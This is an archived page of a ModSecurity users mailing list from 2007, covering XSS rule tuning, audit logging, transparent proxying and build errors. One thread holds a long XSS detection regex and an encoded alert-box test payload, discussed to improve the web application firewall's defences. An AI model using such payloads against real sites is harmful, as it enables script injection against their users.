headers
Ofer Shezaf | 1 Aug 06:33

Re: Fwd: rules

Alert and script are common English words and do not, by themselves, serve as a good enough signature for XSS. The rule below requires “alert” or “script” in combination with other factors. For example “<script” would be enough.

 

Now your test vector includes “<script” but encodes “<” as /u003c. While ModSecurity does compensate for common encoding evasion techniques, I have never encountered this one before and therefore wonder whether it is really a valid attack string. If I understood well from a previous e-mail, this attack vector was generated by Watchfire’s AppScan, so I am checking with them to see what this attack vector is all about.

 

Another important note is that alert seldom indicates a real XSS attack, though it is common to XSS testing. After all, I don’t know many attackers who would want to display a pop up to the attacked user.

 

~ Ofer

 

From: mod-security-users-bounces <at> lists.sourceforge.net [mailto:mod-security-users-bounces <at> lists.sourceforge.net] On Behalf Of love wadhwa
Sent: Monday, July 30, 2007 10:48 PM
To: mod-security-users <at> lists.sourceforge.net
Subject: [mod-security-users] Fwd: rules

 



---------- Forwarded message ----------
From: love wadhwa <lovewadhwa <at> gmail.com>
Date: Jul 31, 2007 11:17 AM
Subject: Re: [mod-security-users] rules
To: Ryan Barnett <Ryan.Barnett <at> breach.com>

Hi
This is what i have in my rules file.I only have a single rule for XSS.I don't have specified any encoding.Now specifying the following, when i do run a scanner , it should have caught that url since that has the keyword "alert" or "script" in it and i have specified these keywords in my rules. But i am not getting it being caught and logged to some other file i.e audit.log.

SecRuleEngine On
SecAuditEngine RelevantOnly
SecAuditLog logs/audit.log
SecAuditLogType serial
SecAuditLogParts ABIFHZ
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|script|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|type\b\W*?\b(?:text\b(?:\W*?\b(?:j(?:ava)?|ecma)script\b| [vbscript])|application\b\W*?\bx-(?:java|vb)script\b)|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)\b|a(?:ctivexobject\b|lert\b\W*?\())|<(?:(?:body\b.*?\b(?:backgroun|onloa)d|input\b.*?\\btype\b\W*?\bimage)\b|!\[CDATA\[|script|meta)|(?:\.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\ <at> import)\b)"

 

On 7/30/07, Ryan Barnett < Ryan.Barnett <at> breach.com> wrote:

Are you attempting to bypass or evade this XSS rule by using Unicode encoding?  It looks like this is the case however there are forward slashes instead of % signs -

 

http://www.example.com/cgi-bin/foo.php?p=%u003Cscript%u003Ealert%u0028%u0027XSS%u0020Test%u0020Successful%u0027%u0029%u003C%script%u003E

 

Another thing to keep in mind with regards to evasion tests, and this is especially true with XSS, is that while you may be able to evade the rules the malicious code still needs to be in a format that the backend web application (or in the case of XSS the client browser) will execute.  I don't believe that a browser would execute the code snippet you provided.

 

--
Ryan C. Barnett
ModSecurity Community Manager

Breach Security: Director of Application Security Training
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC

Author: Preventing Web Attacks with Apache

 

 

From: mod-security-users-bounces <at> lists.sourceforge.net [mailto:mod-security-users-bounces <at> lists.sourceforge.net] On Behalf Of love wadhwa
Sent: Monday, July 30, 2007 5:34 AM
To: mod-security-users <at> lists.sourceforge.net
Subject: [mod-security-users] rules

 

hi
I have been using the following rules in my conf file.

SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|script|alert|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|type\b\W*?\b(?:text\b(?:\W*?\b(?:j(?:ava)?|ecma)script\b| [vbscript])|application\b\W*?\bx-(?:java|vb)script\b)|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)\b|a(?:ctivexobject\b|lert\b\W*?\())|<(?:(?:body\b.*?\b(?:backgroun|onloa)d|input\b.*?\\btype\b\W*?\bimage)\b|!\[CDATA\[|script|meta)|(?:\.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\ <at> import)\b)"

although i do have "script" and "alert" keyword in my rules as a filter i am still getting the following url with status code 200
/u003Cscript/u003Ealert/u0028/u0027XSS/u0020Test/u0020Successful/u0027/u0029/u003C/script/u003E

Plz help  me regardin the same and see if some  changes have to be made in rules.
--
Warm Regards
Love Wadhwa
RedHat Certified Engg




--
Warm Regards
Love Wadhwa
RedHat Certified Engg



--
Warm Regards
Love Wadhwa
RedHat Certified Engg 

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
_______________________________________________
mod-security-users mailing list
mod-security-users <at> lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Permalink | Reply | 0 comments |
headers
Emre | 1 Aug 15:08
Picon
Favicon

modsecurity rpm package

Hi all,

 

I would like to know if there is a rpm package of modsecurity 2.* for RedHat 4 EL edition.

 

It would be sensible if any of you responses me.

 

See you all later.

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
_______________________________________________
mod-security-users mailing list
mod-security-users <at> lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Permalink | Reply | 1 comment |
headers
Alexandre SALEM | 1 Aug 16:34
Picon

mod_security on winNt send concurrent log to the console

Hi guys,

Thx for your fast answer. I think I ve noticed a bug on windows.

It seems that my defined SecAuditLogParts doesn't work. I still have the E part with the full source code of a 200 OK request.

Here is my current config :

SecAuditEngine RelevantOnly
SecAuditLogType serial
SecAuditLogParts ABIFHZ
SecAuditLogRelevantStatus "^(?:5|40[^4]|4[1-9]\d)"
SecAuditLog e:/auditlog/sec.log

What you think ?

Alex

2007/7/31, Brian Rectanus <Brian.Rectanus <at> breach.com >:
Alexandre SALEM wrote:
> Hi Brian,

Hi

> I`m Alex a member of the mod_security mailist. On my Apache server
> (win32), my console gets no information from the Auditlog and I don't
> know why ? But, I`m able to run this perl script with the windows prompt.


Yeah, this seems to be a bug in Apache on windows.


> I looked this topic but i have not found an issue:
> http://article.gmane.org/gmane.comp.apache.mod-security.user/3463
>
> How i can send this concurrent log to the Console ?


There is a solution in the archives:

http://sourceforge.net/mailarchive/message.php?msg_name=46850E1B.4020208%40breach.com

And I think Aleks has this for download here:

http://www.securitylab.ru/_download/software/modsec-auditlog-collector.pl

-B


--
Brian Rectanus
Breach Security

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
_______________________________________________
mod-security-users mailing list
mod-security-users <at> lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Permalink | Reply | 1 comment |
headers
Jason Haar | 1 Aug 21:19
Picon
Picon

transparent proxy support in Apache?

Hi there

I'm making a WAF (Web Application Firewall)  based around Linux/Apache
and mod_security, and as part of the design, thought that making it a
transparent (reverse) proxy would be a good move from a disaster
recovery perspective (i.e. if it blew up you could just wire around it
and the backends would still be available).

Anyway, I did some quick tests with Apache (2.2.4) and found that it
really has no transparent proxy support? I can get the iptables rules in
place to redirect traffic meant for other servers to terminate on it -
but Apache reads them all as connections to itself - i.e. the
VirtualHosts don't kick in correctly.

Also, the WAF would primarily be used to protect HTTPS sites. Now I know
"you can't transparently proxy HTTPS" is the mantra -  but that's not
quite true from what I know. I mean, this would be an "official" WAF - so
it would have copies of the server certs used on the real backends - so
it could actually do a successful "man-in-the-middle". But again it
relies on Apache to be able to glean information about the real
destination IP addresses so that it could map connections through to the
real backend server. I guess Apache would need a "VirtualListen" option...

I've done this successfully with Squid as a normal proxy, but I really
need the funky features of Apache as a reverse-proxy - but I want
transparency too...

Is it doable? Thanks!

-- Cheers Jason Haar Information Security Manager, Trimble Navigation
Ltd. Phone: +64 3 9635 377 Fax: +64 3 9635 417 PGP Fingerprint: 7A2E
0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1

--

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
Permalink | Reply | 0 comments |
headers
Ryan Barnett | 1 Aug 23:07

Re: transparent proxy support in Apache?

This is possible to do but it is not trivial to recode.  If you don't have the time/resources to do this
yourself you might want to consider the just released M1100 appliance by Breach.  It can funtion as a
transparent bridge.

Check out the Breach site for more info - http://www.breach.com/products/modsecuritypro_m1100.html

Thanks,
Ryan C. Barnett 

----- Original Message -----
From: mod-security-users-bounces <at> lists.sourceforge.net <mod-security-users-bounces <at> lists.sourceforge.net>
To: mod-security-users <at> lists.sourceforge.net <mod-security-users <at> lists.sourceforge.net>
Sent: Wed Aug 01 15:19:47 2007
Subject: [mod-security-users] transparent proxy support in Apache?

Hi there

I'm making a WAF (Web Application Firewall)  based around Linux/Apache
and mod_security, and as part of the design, thought that making it a
transparent (reverse) proxy would be a good move from a disaster
recovery perspective (i.e. if it blew up you could just wire around it
and the backends would still be available).

Anyway, I did some quick tests with Apache (2.2.4) and found that it
really has no transparent proxy support? I can get the iptables rules in
place to redirect traffic meant for other servers to terminate on it -
but Apache reads them all as connections to itself - i.e. the
VirtualHosts don't kick in correctly.

Also, the WAF would primarily be used to protect HTTPS sites. Now I know
"you can't transparently proxy HTTPS" is the mantra -  but that's not
quite true from what I know. I mean, this would be an "official" WAF - so
it would have copies of the server certs used on the real backends - so
it could actually do a successful "man-in-the-middle". But again it
relies on Apache to be able to glean information about the real
destination IP addresses so that it could map connections through to the
real backend server. I guess Apache would need a "VirtualListen" option...

I've done this successfully with Squid as a normal proxy, but I really
need the funky features of Apache as a reverse-proxy - but I want
transparency too...

Is it doable? Thanks!

-- Cheers Jason Haar Information Security Manager, Trimble Navigation
Ltd. Phone: +64 3 9635 377 Fax: +64 3 9635 417 PGP Fingerprint: 7A2E
0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
_______________________________________________
mod-security-users mailing list
mod-security-users <at> lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
Permalink | Reply | 0 comments |
headers
Lund, Holly | 2 Aug 13:23

Problem compiling on Solaris 10

Using Solaris apache pkgs and SUNWspro

Get the following error:

cc: illegal option -Wuninitialized
*** Error code 1
make: Fatal error: Command failed for target `mod_security2.slo'

Any ideas

It didn’t work with gcc either…I got a __divid3 symbol reference error

Holly Lund
301-903-1174 

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
_______________________________________________
mod-security-users mailing list
mod-security-users <at> lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Permalink | Reply | 0 comments |
headers
MIKE YRABEDRA | 2 Aug 16:09
Favicon

Install error on intel xserve


I am attempting to install ms2 with apache 2.2.4 on Mac OS X server.

Here is the error I get at the very end...

secure4:/usr/local/src/modsecurity-apache_2.1.1/apache2 root# make install
/usr/local/apache2/build/libtool --silent --mode=install cp mod_security2.la
/usr/local/apache2/modules/
Warning!  dlname not found in /usr/local/apache2/modules/mod_security2.la.
Assuming installing a .so rather than a libtool archive.

I have seen this mentioned in the list archive, but never a solution.

Here is the config I used to build apache if that will help?

$ root ./configure --prefix=/usr/local/apache2 --enable-access \
--enable-actions --enable-alias --enable-asis --enable-auth \
--enable-auth_dbm --enable-auth_digest --enable-autoindex \
--enable-cache --enable-cgi --enable-dav --enable-dav_fs \
--enable-deflate --enable-dir --enable-disk_cache \
--enable-dumpio --enable-env --enable-expires --enable-fastcgi \
--enable-file_cache --enable-headers --enable-imap \
--enable-include --enable-info --enable-log_config \
--enable-log_forensic --enable-logio --enable-mem_cache --enable-mime \
--enable-mime_magic --enable-negotiation --enable-perl \
--enable-rewrite --enable-setenvif --enable-speling --enable-ssl \
--enable-status --enable-suexec --enable-unique_id --enable-userdir \
--enable-usertrack --enable-version --enable-vhost_alias --enable-so \
--enable-module=all --enable-shared=max

--

-- 
Mike B^)>

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
Permalink | Reply | 1 comment |
headers
Mike Yrabedra | 3 Aug 01:03
Favicon

Re: Install error on intel xserve


It should be noted that I was able to install the php5 .so with no problems.

I have googled as much as I can, no joy.

Does ModSecurity not support Mac OS X ?

on 8/2/07 10:09 AM, MIKE YRABEDRA at lists <at> 323inc.com wrote:

> 
> 
> I am attempting to install ms2 with apache 2.2.4 on Mac OS X server.
> 
> Here is the error I get at the very end...
> 
> secure4:/usr/local/src/modsecurity-apache_2.1.1/apache2 root# make install
> /usr/local/apache2/build/libtool --silent --mode=install cp mod_security2.la
> /usr/local/apache2/modules/
> Warning!  dlname not found in /usr/local/apache2/modules/mod_security2.la.
> Assuming installing a .so rather than a libtool archive.
> 
> I have seen this mentioned in the list archive, but never a solution.
> 
> Here is the config I used to build apache if that will help?
> 
> $ root ./configure --prefix=/usr/local/apache2 --enable-access \
> --enable-actions --enable-alias --enable-asis --enable-auth \
> --enable-auth_dbm --enable-auth_digest --enable-autoindex \
> --enable-cache --enable-cgi --enable-dav --enable-dav_fs \
> --enable-deflate --enable-dir --enable-disk_cache \
> --enable-dumpio --enable-env --enable-expires --enable-fastcgi \
> --enable-file_cache --enable-headers --enable-imap \
> --enable-include --enable-info --enable-log_config \
> --enable-log_forensic --enable-logio --enable-mem_cache --enable-mime \
> --enable-mime_magic --enable-negotiation --enable-perl \
> --enable-rewrite --enable-setenvif --enable-speling --enable-ssl \
> --enable-status --enable-suexec --enable-unique_id --enable-userdir \
> --enable-usertrack --enable-version --enable-vhost_alias --enable-so \
> --enable-module=all --enable-shared=max
> 

--

-- 
Mike Yrabedra B^)>

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
Permalink | Reply | 0 comments |
headers
Alexandre SALEM | 3 Aug 08:40
Picon

How I can get rid of this error ?

Hi guys,

When a robot scan my server I always get this error :

Message: Warning. Match of "rx OPTIONS" against "REQUEST_METHOD" required. [id "960015"] [msg "Request Missing an Accept Header"] [severity "CRITICAL"]

How I can get rid of this message ?

Thx All

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
_______________________________________________
mod-security-users mailing list
mod-security-users <at> lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Permalink | Reply | 1 comment |
headers
Tim Simpson | 3 Aug 16:47
Picon
Favicon

Mod_Security console installing on XP

Hello,

hopefully someone can help me

I have downloaded mod_security console from the breach website and have
installed it on my windows xp sp2 system

but the service will not start

It displays the message "Error 1 incorrect function"

does anyone know what this might mean and how to go about fixing it

I'm not to clear about where the cosole should be installed, are you supposed
to install it on the web server that mod_security is running on or can you use
any device and then point the console at that system

any help gratefully received

Tim

-----------------------------------------------------------------------
---------------------------
This email and any files transmitted with it is confidential and 
intended solely
for the person or organisation to whom it is addressed.  If you are 
not the
intended recipient, you must not read, copy or disseminate the 
information
or take any action in reliance on it and it would be appreciated if 
you would
also notify the sender by reply email and then delete this email 
immediately.
All messages passing out of this gateway are checked for viruses but 
Dundee City Council strongly recommends that you check for viruses 
using 
your own virus scanner as the Council will not take responsibility for 
any
damage caused as a result of virus infection.
-----------------------------------------------------------------------
--------------------

-------------------------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >>  http://get.splunk.com/
Permalink | Reply | 1 comment |

Gmane